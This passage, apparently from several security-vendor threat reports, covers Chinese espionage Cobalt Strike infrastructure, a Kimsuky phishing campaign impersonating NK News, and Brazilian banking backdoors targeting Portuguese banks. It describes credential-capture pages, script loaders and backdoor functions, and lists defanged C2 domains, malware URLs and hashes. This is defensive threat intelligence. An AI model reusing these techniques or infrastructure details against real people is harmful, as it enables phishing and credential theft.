live100heip[.]com GET: /owa/Z7bziD-BDtV9U1aLS9AhW4jyN1NEOelTEi
POST: /owa/LAC9kgQyM1HD3NSIwiโ€“mx9sHB3vcmjJJm
www.100helpchat[.]com GET: /owa/aLgnP5aHtit33SA2p2MenNuBmYy
POST: /owa/XF0O-PjSCEslnDo51T0K4TOY

The Cobalt Strike profiles associated with the duckducklive[.]top, www.100helpchat[.]com, and live100heip[.]com domains share a C2 port number (8443) and a watermark (391144938). The earliest record of duckducklive[.]top becoming active is dated 24 Feb 2023. The earliest records of live100heip[.]com and 100helpchat[.]com becoming active are dated 24 Feb 2023 (overlapping with that of duckducklive[.]top) and 28 Feb 2023, respectively.

The three domains are each hidden behind CloudFlare, who were quick in remediation after we reported the service abuse. In this case, however, the actors revealed their true-hosting locations due to an OPSEC mistake in their initial deployment of the domainโ€™s SSL certificates on their Alibaba Cloud hosting servers at 8.218.31[.]103, 47.242.72[.]118, and 47.242.159[.]242.

Certificates use on Alibaba IPs
Certificates use on Alibaba IPs

While the analysis of the Cobalt Strike profiles provides links to previous BRONZE STARLIGHT activities, an assessment of the specific group attribution based on current intelligence should be treated with caution. It is noteworthy that Chinese cyber espionage threat actors are progressively refining their operational tactics in manners that obfuscate clear attribution through publicly available intelligence sources alone.

To illustrate this concept, consider the scenario where a broader array of domains imitating various brands may be interconnected, such as those publicly documented involving the BRONZE STARLIGHT, TA410, and APT10 threat actors. Examples include microsofts[.]net, microupdate[.]xyz, microsofts[.]info, microsofts[.]org, miscrosofts[.]com, microsofts[.]com, kaspresksy[.]com, tencentchat[.]net, and microsoftlab[.]top.

Conclusion

China-nexus threat actors have consistently shared malware, infrastructure, and operational tactics in the past, and continue to do so. The activities this post discusses illustrate the intricate nature of the Chinese threat landscape.

Better understanding of this landscape is essential for keeping up with its dynamics and improving defense strategies. Achieving this necessitates consistent collaborative and information sharing efforts. SentinelLabs remains dedicated to this mission and continues to closely monitor related threats.

Indicators of Compromise

Files (SHA1)

Indicator Description
09f82b963129bbcc6d784308f0d39d8c6b09b293 agentupdate_plugins.exe
1a11aa4bd3f2317993cfe6d652fbe5ab652db151 LockDown.dll
32b545353f4e968dc140c14bc436ce2a91aacd82 mfeann.exe
4b79016d11910e2a59b18275c786682e423be4b4 Adobe CEF Helper.exe
559b4409ff3611adaae1bf03cbadaa747432521b identity_helper.exe
57bbc5fcfd97d25edb9cce7e3dc9180ee0df7111 agentdata.dat
6e9592920cdce90a7c03155ef8b113911c20bb3a AdventureQuest.exe
76bf5ab6676a1e01727a069cc00f228f0558f842 agentdata.dat
88c353e12bd23437681c79f31310177fd476a846 libcef.dll
957e313abaf540398af47af367a267202a900007 msedge_elf.dll

Second-Stage Data URLs

https[://]agenfile.oss-ap-southeast-1[.]aliyuncs.com/agent_source/temp1/cefhelper.zip AdventureQuest.exe
https[://]agenfile.oss-ap-southeast-1.aliyuncs.com/agent_source/temp2/agent_bak.zip AdventureQuest.exe
https[://]agenfile.oss-ap-southeast-1.aliyuncs.com/agent_source/temp3/adobe_helper.zip agentupdate_plugins.exe
https[://]codewavehub.oss-ap-southeast-1.aliyuncs[.]com/org/com/file/CodeVerse.zip AdventureQuest.exe

C2 Domains

www.100helpchat[.]com Cobalt Strike
live100heip[.]com Cobalt Strike

C2 IP Addresses

8.218.31[.]103 Cobalt Strike
47.242.72[.]118 Cobalt Strike

Kimsuky Strikes Again | New Social Engineering Campaign Aims to Steal Credentials and Gather Strategic Intelligence

6 June 2023 at 10:55

Executive Summary

  • SentinelLabs has been tracking a social engineering campaign by the North Korean APT group Kimsuky targeting experts in North Korean affairs, part of a broader campaign discussed in a recent NSA advisory.
  • The campaign has the objective of stealing Google and subscription credentials of a reputable news and analysis service focusing on North Korea, as well as delivering reconnaissance malware.
  • Kimsuky engages in extensive email correspondence and uses spoofed URLs, websites imitating legitimate web platforms, and Office documents weaponized with the ReconShark malware.
  • This activity indicates Kimsukyโ€™s growing dedication to social engineering and highlights the groupโ€™s increasing interest in gathering strategic intelligence.

Overview

In collaboration with NK News, a leading subscription-based service that provides news and analyses about North Korea, SentinelLabs has been tracking a targeted social engineering campaign against experts in North Korean affairs from the non-government sector. The campaign focuses on theft of email credentials, delivery of reconnaissance malware, and theft of NK News subscription credentials. Based on the used malware, infrastructure, and tactics, we assess with high confidence that the campaign has been orchestrated by the Kimsuky threat actor.

The social engineering tactics and some infrastructure characteristics closely relate to a Kimsuky activity privately reported by PwC and discussed in an NSA advisory published during the writing of this article. We focus on the specific targeting of expert analysts of North Korean affairs by impersonating NK News and stealing NK News credentials, and provide details on used TTPs to support collaborative hunting and detection efforts.

Kimsuky, a suspected North Korean advanced persistent threat (APT) group whose activities align with the interests of the North Korean government, is known for its global targeting of organizations and individuals. Operating since at least 2012, the group often employs targeted phishing and social engineering tactics to gather intelligence and access sensitive information.

A hallmark of the activity we discuss in this post is Kimsukyโ€™s focus on establishing initial contact and developing a rapport with their targets prior to initiating malicious activities. As part of their initial contact strategy, the group impersonated Chad Oโ€™Carroll, the founder of NK News and the associated holding company Korea Risk Group, using an attacker-created domain, nknews[.]pro, which closely resembles the legitimate NK News domain nknews.org. The initial email requests the review of a draft article analyzing the nuclear threat posed by North Korea.

If the target engages in the conversation, Kimsuky uses the opportunity to deliver a spoofed URL to a Google document, which redirects to a malicious website specifically crafted to capture Google credentials. Kimsuky may also deliver a weaponized Office document that executes the ReconShark reconnaissance malware.

Further, Kimsukyโ€™s objective extends to the theft of subscription credentials from NK News. To achieve this, the group distributes emails that lure targeted individuals to log in on the malicious website nknews[.]pro, which masquerades as the authentic NK News site. The login form that is presented to the target is designed to capture entered credentials.

This Kimsuky activity indicates the groupโ€™s growing efforts to establish early communication and foster trust with their targets prior to initiating malicious operations, including the delivery of malware. Their approach highlights the groupโ€™s commitment to creating a sense of rapport with the individuals they target, potentially increasing the success rate of their subsequent malicious activities.

By actively targeting high-profile experts in North Korean affairs and stealing subscription credentials from prominent news and analysis outlets focussing on North Korea, Kimsuky demonstrates a heightened curiosity in understanding how the international community perceives developments concerning North Korea, such as the countryโ€™s military activities. These actions are probably part of their broader objective to gather strategic intelligence, contributing to North Koreaโ€™s decision-making processes.

Google Credential Theft

We observed Kimsuky distributing an HTML-formatted phishing email to selected individuals, which requests the review of a draft article analyzing the nuclear threat posed by North Korea. The email primarily aims to initiate a subsequent conversation and is intentionally designed to appear benign: It impersonates NK News leadership and lacks any malicious artifacts.

Kimsuky Social Engineering Campaign Initial email
Initial email

If the target engages in the conversation, Kimsuky eventually follows up with an email that contains an URL to a Google document.

Kimsuky Social Engineering Campaign Follow-up email
Follow-up email

If the target is not responsive, Kimsuky follows up with a reminder email in an attempt to engage the target in conversation.

Kimsuky Social Engineering Campaign Reminder email
Reminder email

The URLโ€™s destination is manipulated through the spoofing technique of setting the href HTML property to direct to a website created by Kimsuky. This method, commonly employed in phishing attacks, creates a discrepancy between the perceived legitimacy of the link (a genuine Google document) and the actual website visited upon clicking the URL.

The displayed URL to a Google document points to an actual article hosted on Google Docs, delving into the topic of the North Korean nuclear threat. The article contains visible edits to give the impression of a genuine draft article, aligning with Kimsukyโ€™s luring tactic.

Kimsuky Google document
Google document

The spoofed destination of the URL redirects the target to an attacker-created website that masquerades as a legitimate Google Docs site for requesting document access, such as

https[://]drive-google[.]shanumedia[.]com/pdf/ul/ji78fghJHKtgfLKJIO/s2.php?menu=ZGFu[...]vbQ==

The Base-64 encoded segment, that is, the value of the menu URL query parameter, resolves to the targetโ€™s email address.

This serves as a means of transporting the targetโ€™s address to the fake Google Docs site, which enables the site to dynamically display the address, creating a personalized and convincing appearance of legitimacy. The design and functionality of this site suggest its potential for reuse in targeting different individuals.

Malicious Google Docs site
Malicious Google Docs site

We were unable to analyze the functionality behind the Request access web element as the group has taken down the site. However, given the theme of the site, we suspect that it has been designed to capture entered Google credentials.

During conversations with targeted individuals, Kimsuky also seizes any available opportunity to distribute password-protected weaponized Office documents that deploy the ReconShark reconnaissance malware. ReconShark exfiltrates information relevant for conducting subsequent precision attacks, such as deployed detection mechanisms and hardware information. The implementation of the ReconShark variant we observed in this activity remains the same as the one covered in our previous post on Kimsuky activity, with the main distinction being the use of a different C2 server: staradvertiser[.]store. This domain resolves to the IP address 162.0.209[.]27, which has hosted domains that have been attributed to Kimsuky in previous research, such as sesorin[.]lol and rfa[.]ink. Kimsukyโ€™s use of ReconShark as part of this activity underscores the malwareโ€™s central role within the groupโ€™s current operational playbook.

NK News Credential Theft

We also observed Kimsuky attempting to steal credentials for the subscription service of NK News, which is known for its comprehensive expert analyses and news reports. Gaining access to such reports would provide Kimsuky with valuable insights into how the international community assesses and interprets developments related to North Korea, contributing to their broader strategic intelligence-gathering initiatives.

In order to accomplish this, Kimsuky distributes an email that lure targeted individuals to log in to a spoofed NK News subscription service. The emails prompt the recipients to confirm their NK News accounts under the pretext of recent security updates.

Kimsuky Phishing Email
Phishing Email

The fake login site, hosted at https[://]www.nknews[.]pro/ip/register/, features a login form with the standard web elements, such as Sign In, Sign Up, and Forgot Password? buttons. When clicked, the Sign In button executes the loginAct JavaScript function, whereas the rest of the buttons do not conduct any activities.

Kimsuky Fake NK News login site
Fake NK News login site

The JavaScript code captures entered credentials by issuing an HTTP POST request to https[://]www.nknews[.]pro/ip/register/login[.]php and then redirects the user to the legitimate NK News site.

Kimsuky JavaScript code
JavaScript code

The main website hosted at https[://]www.nknews[.]pro redirects to the legitimate NK News site, https://nknews.org, and uses a certificate issued by Sectigo:

  • Thumbprint: a1597d197e9b084a043ada5c7dac1f9b6d7f7af3
  • Serial number: 00f342582c9a299acf2452aaf5115c5be0

The domain nknews[.]pro, registered through Namecheap, also resolves to the Kimsuky-linked IP address 162.0.209[.]27. The URL https[://]www.nknews[.]pro/config[.]php hosts a password-protected remote management site, which is likely an implementation of the b374k tool, based on the implementation of the login site and the presence of the config.php file. The Kimsuky group is known to use this tool for remote management of its infrastructure.

Kimsuky b374k login site
b374k login site

Conclusion

SentinelLabs remains actively engaged in monitoring the activities conducted by Kimsuky. The findings presented in this post highlight the groupโ€™s persistent commitment to targeted social engineering attacks and underscore the need for increased awareness and understanding of Kimsukyโ€™s tactics among potential targets. Maintaining vigilance and implementing effective security measures are imperative to mitigate the risks posed by this persistent threat actor.

Indicators of Compromise

Indicator Description
nknews[.]pro Phishing email sender domain
chad.ocarroll@nknews[.]pro Phishing email sender address
membership@nknews[.]pro Phishing email sender address
https[://]www.nknews[.]pro Website impersonating NK News
https[://]www.nknews[.]pro/config[.]php Website impersonating NK News: b374k login site
https[://]www.nknews[.]pro/ip/register/ Website impersonating NK News: Fake NK News login site
https[://]www.nknews[.]pro/ip/register/login[.]php Website impersonating NK News: NK News credential theft endpoint
https[://]staradvertiser.store/piece/ca[.]php ReconShark payload hosting endpoint
https[://]staradvertiser.store/piece/r[.]php ReconShark C2 server endpoint
162.0.209[.]27 Website impersonating NK News, ReconShark C2 server: IP address
4150B40C00D8AB2E960AA059159149AF3F9ADA09 Malicious document (password-protected): SHA1 hash
7514FD9E5667FC5085373704FE2EA959258C7595 Malicious document: SHA1 hash
41E39162AE3A6370B1100BE2B35BB09E2CBE9782 ReconShark: SHA1 hash

Operation Magalenha | Long-Running Campaign Pursues Portuguese Credentials and PII

25 May 2023 at 10:55

By Aleksandar Milenkoski and Tom Hegel

Executive Summary

  • Over the first quarter of 2023, SentinelLabs observed a campaign targeting users of Portuguese financial institutions conducted by a Brazilian threat group.
  • The campaign is the latest iteration of a broader activity nexus dating back to 2021, now targeting the users of over 30 financial institutions.
  • The attackers can steal credentials and exfiltrate usersโ€™ data and personal information, which can be leveraged for malicious activities beyond financial gain.
  • The threat group simultaneously deploys two backdoor variants to maximize attack potency.
  • To ensure uninterrupted operations, the threat actor has shifted its infrastructure hosting from IaaS providers implementing stricter anti-abuse measures, such as a major US-based cloud provider, to Timeweb, a Russian IaaS provider known for its more relaxed policies.

Overview

SentinelLabs has been tracking a campaign over the first quarter of 2023 targeting users of Portuguese financial institutions, including government, government-backed, and private institutions. Based on similarities in TTPs as well as overlaps in malware implementation and functionalities reported in previous work, we assess with high confidence that the campaign has been conducted by a Brazilian threat group. This conclusion is further supported by the presence of Brazilian-Portuguese language usage within the infrastructure configurations and malware implementations. We refer to the campaign conducted by this threat group as Operation Magalenha.

The threat actor deploys two backdoor variants on each infected machine, which we collectively dubbed PeepingTitle. Based on overlaps in code and functionalities, we assess that the PeepingTitle backdoors are part of the broader Brazilian financial malware ecosystem โ€“ specifically, of the Maxtrilha family (named by the then-used encryption key) first observed in 2021. We therefore assess that Operation Magalenha is the latest iteration of a long-standing activity nexus.

Operation Magalenha is characterized by changes in infrastructure design, and malware implementation and deployment. The threat actor behind the operation deploys two PeepingTitle variants simultaneously on infected machines, aiming to maximize the potency of their attacks. Further, to ensure uninterrupted operations, the threat actor has strategically transitioned its infrastructure hosting to Timeweb Cloud, a Russian IaaS provider known for its lenient anti-abuse policies, diverging from primarily relying on providers implementing stricter measures, such as DigitalOcean and Dropbox.

The PeepingTitle backdoors are implemented in the Delphi programming language and feature spyware capabilities giving the attackers full control over infected machines, allowing activities such as monitoring window interaction, taking unauthorized screenshots, terminating processes and deploying further malware.

Many of the TTPs we observed relate to those discussed in previous research attributing them to Brazilian threat actors that target users not only in Portugal but also in Spain as well as Central and Latin American countries. These TTPs include the use of Delphi-implemented backdoors, URL shorteners and public file hosting services for hosting malware, and archive files and VB scripts as part of the infection vectors.

Leveraging its malware arsenal, the threat group behind Operation Magalenha can steal credentials, exfiltrate usersโ€™ data and personal information, and achieve full control over infected machines. This opens up further possibilities for the targeting of individuals or organizations, or for the exploitation of that information and data by other cybercriminal or espionage groups.

Infection Vector

Brazilian threat actors are known to distribute malware using a variety of methods, such as phishing emails, social engineering, and malicious websites delivering fake installers of popular applications.

In the context of Operation Magalenha, the infection starts with the execution of a malicious VB script, which primarily serves to download and execute a malware loader and distract users while doing so. The malware loader subsequently downloads and executes the PeepingTitle backdoors.

The VB scripts are obfuscated such that the malicious code is scattered among large quantities of code comments, which is typically pasted content of publicly available code repositories. This is a simple, yet effective technique for evading static detection mechanisms โ€“ the scripts that are available on VirusTotal feature relatively low detection ratios.

Code comments for VB script obfuscation
Code comments for VB script obfuscation

When executed, the VB scripts first open a TinyURL to user login sites of Energias de Portugal (EDP) and the Portuguese Tax and Customs Authority (AT โ€“ Autoridade Tributรกria e Aduaneira). Based on this script behavior, we suspect that the threat group behind Operation Magalenha has been delivering the scripts through EDP- and AT-themed phishing emails, aligning with a known tactic observed among threat actors targeting Portuguese citizens.

The VB scripts serve a twofold purpose for the threat actors:

  • Act as a smoke screen distracting users while the scripts continue to download and execute the malware loader.
  • Enable the theft of EDP and AT credentials if the users enter the credentials after the malware loader has executed the PeepingTitle backdoors. This may provide the threat actor with usersโ€™ personal information. We note that users may login to the Portuguese Tax and Customs Authority in several ways, including using government-issued credentials for citizens to access not only the online services of the Authority, but also other services provided by the Portuguese state.

ย 

A user login site of Energias de Portugal
A user login site of Energias de Portugal

A user login site of the Portuguese Tax and Customs Authority
A user login site of the Portuguese Tax and Customs Authority

The scripts then download to the %PUBLIC% folder an archive file that contains a malware loader. They subsequently extract the loader and delete the archive. Finally, the scripts execute the malware loader after a time interval of, for example, 5 seconds. The malware loader downloads and executes two PeepingTitle backdoor variants.

PeepingTitle

The PeepingTitle sample pairs we analyzed are Delphi executables and have compilation timestamps in April 2023. The samples share some code segments indicating that they have been developed as part of a single development effort. For example, both malware strains implement similar initialization routines, which involve evaluating the presence of the wine_get_version function in the ntdll.dll library file and establishing persistence by editing theย  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run registry key.

Similar to other malware used by Brazilian threat actors, the PeepingTitle backdoors contain string artifacts in Brazilian-Portuguese language.

Strings in a PeepingTitle backdoor (in Brazilian-Portuguese)
Strings in a PeepingTitle backdoor (in Brazilian-Portuguese)

After initialization, at one second intervals the first PeepingTitle variant monitors the titles of application windows that have captured the mouse cursor. The malware first transforms a window title into a lowercase string stripped of any whitespace characters. It then checks if the transformed title contains any of the strings from a predefined set of strings related to targeted institutions. The figure below depicts PeepingTitle monitoring window titles, when a user interacts with a new Google Chrome tab and the Task Manager application, and comparing them against predefined strings.

PeepingTitle window title monitoring
PeepingTitle window title monitoring

The predefined strings are defined such that they are part of the browser window titles when a user visits the online resources (i.e., sites or specific online services) of predominantly Portuguese financial institutions or institutions with a presence in Portugal. These include government, government-backed, and private institutions.

The targeted sites and online services encompass a broad set of activities that users may conduct when interacting with them providing a wealth of personal user information to the threat actor, such as account registration, document overview, and credential input.

The table below lists some of the targeted institutions and services.

PeepingTitle string Targeted institution or service
activobank ActivoBank
aixadirecta Caixadirecta (an online service of Caixa Geral de Depรณsitos, an institution owned by the Portuguese government)
articulares Online banking sites for private users of various institutions
bancanet Citibanamex (online banking site)
bancobest Banco Best
bancoctt Banco CTT
bancomer BBVA
bankia Bankia (currently merged with CaixaBank)
bankinter Bankinter
bpi Banco BPI
caempresas Crรฉdito Agrรญcola (services for corporate users)
caixaagricola Various Mutual Agricultural Credit Banks
caixabank CaixaBank
caixadirectaonline Caixadirecta (a service of Caixa Geral de Depรณsitos)
canaisdigitais Novobanco (online services)
caonline Crรฉdito Agrรญcola (online services)
citibanamex Citibanamex
digitalbanking Online banking services of various institutions
empresas Online banking services for corporate users of various institutions
eurobic EuroBic
homebank Online banking pages of various institutions, such as Banco CTT and Cetelem
ingaccesoclientes ING (login page for online banking)
internetbanking Online banking sites of various institutions, such as the Portuguese Treasury and Public Debt Management Agency
itoagricola Crรฉdito Agrรญcola
loginmillenniumbcp Millennium BCP (Portuguese Commercial Bank)
logintoonlinebanking Online banking services of various institutions
montepio Banco Montepio
netbancoempresas Santander (online banking for corporate users)
netbancoparticulares Santander (online banking for private users)
novobanco Novobanco
openbank Openbank
santander Santander
Example targeted site: The โ€œdigital channelsโ€ subscription form of Novobanco
Example targeted site: The โ€œdigital channelsโ€ subscription form of Novobanco

When a user visits a targeted online resource, PeepingTitle sets the window title monitoring interval to 5 seconds, connects to a C2 server, and exfiltrates data in an encrypted form. The data includes a timestamp, the name of the infected machine, and the captured window title, also in an encrypted form. This registers the infected machine at the C2 server.

Exfiltrated data (plaintext form)
Exfiltrated data (plaintext form)

PeepingTitle implements backdoor capabilities that allow for full control over the compromised machines, some of which are:

  • Process termination and screenshot capture: PeepingTitle can take screenshots of the entire screen.
  • Staging of further malware: This involves executing malware placed in the %PUBLIC% directory, or first downloading malware executables from attacker-controlled locations to this directory, and subsequent execution. The staged malware could implement any capabilities the threat actor may need in a given situation, such as further data exfiltration, or interaction and overlay screen capabilities to bypass multi-factor authentication. PeepingTitle supports the execution of Windows PE images and DLL files using the rundll32 Windows utility.
  • Reconfiguration: This includes restarting the PeepingTitle process, reconfiguring the window title monitoring interval to 1 second, and configuring the image scale of the screenshots that PeepingTitle takes.
PeepingTitle downloads and/or executes further malware
PeepingTitle downloads and/or executes further malware

In contrast to the first variant, the second PeepingTitle variant registers the infected machine at the C2 server upon execution: The malware exfiltrates data in an encrypted form, which includes the name of the infected machine and volume serial numbers. The malware then continues to monitor for changes of the top-level window and takes a screenshot of this window whenever the user changes it.

PeepingTitle sends the screenshot to a different C2 server than the one used for registering the infected machine. The figure below depicts PeepingTitle monitoring for changes of the top-level window, when this window is first of the Task Manager application and then twice of a new Google Chrome tab โ€“ the backdoor will take a screenshot of the Google Chrome window only once.

PeepingTitle monitoring for top-level window changes
PeepingTitle monitoring for top-level window changes

With the first PeepingTitle variant capturing the entire screen, and the second capturing each window a user interacts with, this malware duo provides the threat actor with a detailed insight into user activity. The second PeepingTitle variant implements further features, such as downloading and executing malware in the form of Windows PE images, process termination, and malware reconfiguration.

Infrastructure Analysis

Analysis of all infrastructure associated with the threat group behind Operation Magalenha revealed noteworthy changes in design for the operation. First, it is useful to understand the threat actorsโ€™ infrastructure design prior to the latest 2023 activity.

Early to mid 2022 associated activity centered primarily around abusing DigitalOcean Spaces, the S3 compatible cloud storage service, for hosting the malware used at the time โ€“ acting as download locations for target malware delivery. Specifically, bucket name and example URL originally used include:

Bucket Name Example URL
Audaction https[://]audaction.fra1.digitaloceanspaces[.]com/pass/alma32.cdr
Azuredatabrickstrainne https[://]azuredatabrickstrainne.sfo3.digitaloceanspaces[.]com/Workspace.zip
Believeonline https[://]believeonline.ams3.digitaloceanspaces[.]com/acoustic/p0.cdr
Cleannertools https[://]cleannertools.fra1.cdn.digitaloceanspaces[.]com/word.ppt
Dssmithcheck https[://]dssmithcheck.fra1.digitaloceanspaces[.]com/track01.sql
Fintecgroup https[://]fintecgroup.ams3.digitaloceanspaces[.]com/louse.msf
Ingretationcompatible http[://]ingretationcompatible.sgp1.digitaloceanspaces[.]com/board.zip
Jackfrostgo http[://]jackfrostgo.fra1.digitaloceanspaces[.]com/thems%20(4).cdr
Marthmusicclub https[://]marthmusicclub.sfo3.digitaloceanspaces[.]com/betunios.cdr
Munich https[://]munich.ams3.digitaloceanspaces[.]com/Minimize.jpeg
Partyprogames https[://]partyprogames.ams3.digitaloceanspaces[.]com/bets.cdr
Pexelsfiles http[://]pexelsfiles.ams3.digitaloceanspaces[.]com/pexels.ppt
Pratoonecooltool https[://]pratoonecooltool.sfo3.digitaloceanspaces[.]com/national.ppt
Ryzemamd https[://]ryzemamd.ams3.digitaloceanspaces[.]com/amd.cdr
Ryzenbootsector http[://]ryzenbootsector.fra1.digitaloceanspaces[.]com/ryzen%20(3).zip
Starbuckplaylist https[://]starbuckplaylist.ams3.digitaloceanspaces[.]com/fiis.cdr
Wekkword https[://]wekkword.ams3.digitaloceanspaces[.]com/alphabet32.cdr
Wordcupnewsrocket https[://]wordcupnewsrocket.ams3.digitaloceanspaces[.]com/INT64.cdr
Wordmusic https[://]wordmusic.ams3.digitaloceanspaces[.]com/bestmusic.cdr
Workingprofstatus https[://]ams3.digitaloceanspaces[.]com/workingprofstatus/anime.cdr

In mid 2022, the threat group experimented with using lesser known file hosting providers, and in one case Dropbox. One provider that became increasingly popular was Timeweb, the Russian IaaS provider.

Moving into 2023, the threat group shifted from primarily using DigitalOcean Spaces to Timeweb for malware hosting and C2. Today, the actor continues to use Timeweb Cloud S3 object storage similar to how DigitalOcean was abused. Note that limited Timeweb use overlapped with DigitalOcean use since mid 2022; however, the change appears more strategic since the start of 2023. The shift away from DigitalOcean was due to increased difficulty in hosting the malware without campaign disruption.

Following this design change, a new cluster of activity can be built and linked to the same actor. The cluster makes use of new C2 servers, Timeweb Cloud malware hosting locations, and of course malware samples.

Example map of Timeweb Infrastructure use
Example map of Timeweb Infrastructure use (list in IOC section)

One associated server stuck out as unique โ€“ 193.218.204[.]207, which is on AS211180 for OKLAKO. Of note, the server has open directories showing a file structure and provides us some insight into backend server design and a small number of victim hosts.

Decoded configuration file
Decoded configuration file

Further clues point to Brazilian-Portuguese-speaking threat actors, such as mdfiles.php returning ARQUIVO ENVIADO! (FILE SENT!) to beaconing hosts. Additionally, the publicly available file (SHA1: dff84020be1f4691bed628d300df8a8b12a4de7e) contains Base64 data, which can be decoded to show the configuration file set to beacon to 193.218.204[.]207 while also containing Brazilian-Portuguese text for VARIABLE IS OK and UPDATE.

Decoded configuration file
Decoded configuration file

Conclusion

Operation Magalenha indicates the persistent nature of the Brazilian threat actors. These groups represent an evolving threat to organizations and individuals in their target countries and have demonstrated a consistent capacity to update their malware arsenal and tactics, allowing them to remain effective in their campaigns.

Their capacity to orchestrate attacks in Portuguese- and Spanish-speaking countries in Europe, Central, and Latin America suggests an understanding of the local financial landscape and a willingness to invest time and resources in developing targeted campaigns. As such, it is important for organizations and individuals to remain vigilant and take proactive measures to protect themselves from this threat.

Indicators of Compromise

Below is a list of shortened URLs, SHA1 hashes (of scripts, archive files, and malware samples), and URLs (malware hosting and C2 server locations) associated with Operation Magalenha and related activities conducted by the threat group behind the operation dating back to 2022.

Shortened URLs

https[://]tinyurl.com/edpmobilecliente
https[://]tinyurl.com/dashboaraudicaofastaccoun
https[://]tinyurl.com/edpareaparticulares
https[://]tinyurl.com/miareapersonal

SHA1 Hashes

001334b045e0d1e28c260380f24c1fa072cb12eb
0131862cd70303d560d47333cce4d2b58505222e
045d5be69b5ba4ffb4253b029cc01d827706c75a
0716415bc910e4a9501d43ac03410288a4e860d4
071c53099decea6d9117e4ee519470140c68c7e9
0a202ca568087eabeb741648be4255d834ab14b1
13b370f368c1df2d30bb8fdf96d84e66e07c8a79
17fe9cdd20a64fec5d471f6878a462a2ef0af212
1a5ad2fb1d4fc4971286bdd5abf669722d7e4c19
1e65c104c765e6e46887f7de04cc14f52dbdfe98
208572a9f44d5349382c58d51d2d14532bc87bb3
266a1c4b8bd95595dcdd46bcb409ee773bd2f407
268d93bfd3f0a8a5cd76eea6311eb2a0b754a4e2
26be17aef483d553c0e5678e35611b019acd28a3
280999b0490bbe06665d35f2cda373fa32bfc59c
2ee320533e687da7613721446dabceecafb940c1
3079bba1a2372282f6bb4a35706144d5b9800953
32d15771736bb5c3232c3fa68ee3da4161177413
35597059ae1f14f50d7fe8b1858525552f62da19
3a1e1294e894b9dd35edfdd59f67049729121619
3be8f26dbc49b8a2504c58de247b838888e15a17
418fabf734c0803f2686a41665f06525cfa3adbb
41ab10d5e057e714d8caad5855c115f5bef76097
42ee272c6bc93c5c0c47024f631350c23edc06fe
43a55a5954d56c4e9fe63cfdd6ab0c97766c9642
44da6f99de08e5193a64a89ce696d775248314d9
45304d8ae20e0fcaf975be64b7844c361ae61537
470e52d04a89318a868402617b2edd16e1a20613
483a4a7e4650502e36dacde33652bf6b62718822
48e77c8ab75d042d1526fe3cd40beeea5fff7794
494d166f7b052c7feaf5666062dcf54525873ac2
4fc26b033677b6a6dc77ae3c4451d3d4421bcc04
51be9fb55ff9606b0f4e887d332608f41533215e
52d06e3b0e3b91165bdba769a94710bbdad8d8d7
542b320b77bb3f826ee17009564613352e5a4911
5c9fc5902ced06f7068f95dfa7c25c1939be3f51
5e38e6a927309aac4679a6d63c1e01b3830ca7c7
5ee9c3e8ff35bc0435d0691112d7f101856d9a51
603ac1e61a39c74d5053ccedd6964ce5f9f365f3
62a1fd987b051586132b1d1752d78821139efb7f
62b1ef509f0f9dffa611f3addface8f91089b0c3
69beb59e75f70487edbbf997aba83b926674a355
6a43e8c05194e066b85845e454d41bf86e1ab376
6a977ae1ad3466f20f50e101b5a561ad3ffc3aa7
6c3d57a7b6631adbe3b6a2c2d88eef6593c51900
6e00ef494a5955df4802c078ae3ffc6c6abdcbd7
72b3be646f03a71e8a2632096ddf6638bc0141c9
7339585c17aaa96e93f971b64548666a3b09d1f9
738aff3e88f498c3607eeadd37b95791acf40196
76b1bb307e1489999da725c2c9fac5b4581cb448
7992e075bc9de98e944930372f1768ccc08e429f
79ce7defeed60bba523bc3779cb9379435157f93
7bbe644df54723d7a48bef58a616a62559401d0d
7e82f8608c199eb32230dd2706c11b2e70ba13d8
7f3c5142f60cd36073b54eda77b38be754a5f7d5
824268bffde52dc44fedc254dc59ef559b7b2d17
830c4e2cc10bbf122882a177a3ea8e810b114c82
8752dab95747175bdb6cb7772cf4d11858049c9d
87ff9f5f3f4853d0c218ac36182fa18bc5e206d0
890c8ab68be8990deb26dab6f5c82f0a812b9fcb
8c62851c74dc2bd1077edfb7456f87b47199925c
8cc16c418764d26b15d41f713551a7d0f214ab4c
97bab3df5acbd1e4ad8b9a38cbbd80c297971490
9ab7bc8a9b4ccbc75903e78d96357e11dfd97535
9c997e9ee92209be186de2a4f9696122bdfbc46d
9eaa52e9f72f0b43648699a3a511d0a7c6ffcdd5
a0721a76cc8a0e44bf734206638ba013da809325
a28db721736fe5d6281c08b4f2f396da480eb170
a53b9e14f316a62e8c6c7a53a7c98158fda29533
a7c7233274e34b69b6c62caceebb19135f9034b2
acc753a084b8172981b3086122929eb4abde131a
afd5ccd6effb4eed6aec656a25ed869b954ee213
affcb29e3e8b510cab6b836672511bc738f2d328
b0253186f56662ecfbebf95cc91a887e161e32d3
b427cf74c820985cc3cedef68b9953c2e83631e1
b50ced2769e74050b130fbcb28c6d80880cfe612
b7ce5ab969a2088a7d6c401c72eeff63173ce491
bed147a98e6bff36cf3bccfc7640d444040e1f0c
c3aa8423bba6f01528f822eddb692ae56aa1be6b
c43f60bf6c24dd6c290b40afb26ea60094688a73
c4c59fc68f225bdec7e22bead289fda2503fb6b0
c5239a9994ca54ac08e45ce7443d9226151d0b36
cd5892ca5b21999799a04d72fb93dc815f7227aa
cdd2f94c542bf369702271cd83c6aa9ff2e595ea
d1dca2dc87376c833644a04c74e4f102565e810a
d2e078450e479a6cd3b1d95597fd2204fd370c42
d86aabf4713b18718421b5c0fd4084143d4f7f08
db9521169aaad154e31d4e573414459e26b57900
dc04ad9e1d8022a06a28d0522b2a1988c8ed4bab
dcdf79b172f340dc173d038d05c7eb826c55c3dc
dd46a9c61ad4aee2c865a4144733d1daf7d6bc79
dec59a76e8f1703d15fcb7f7532c759aaf717165
df0a90c8890f83f760e41c853d9033d3971194e9
df99c6fabdf6fc664e9c466af8a2986af0bfbfb8
dff84020be1f4691bed628d300df8a8b12a4de7e
dff84020be1f4691bed628d300df8a8b12a4de7e
e6215a2e0c4745eef724019cab07c04dac75725e
e9f9a5f559366a8e66f81d43ecc05d051b6e3853
eaa2c945b22f5c1b8bfbd6d8692826d841fc9185
f00493ea6b1a2cb50c74feb3af65bfaabf327a07
f534e0a04ceb6f3e1a10209f416675e9df127afc
f5a99ecd7847cc79210d5df505e222828ad63199
f66d71e1ab5c85ed43d21ff567ee3369fe97b6ed
f72ade72050a6ce63224aad2c7699160705b414c
f9db9f525f2bf09f2b85c91ea09f6251e00e2a95
fbcd460acbe8c0919f61946ac0c9ee4d8885075a
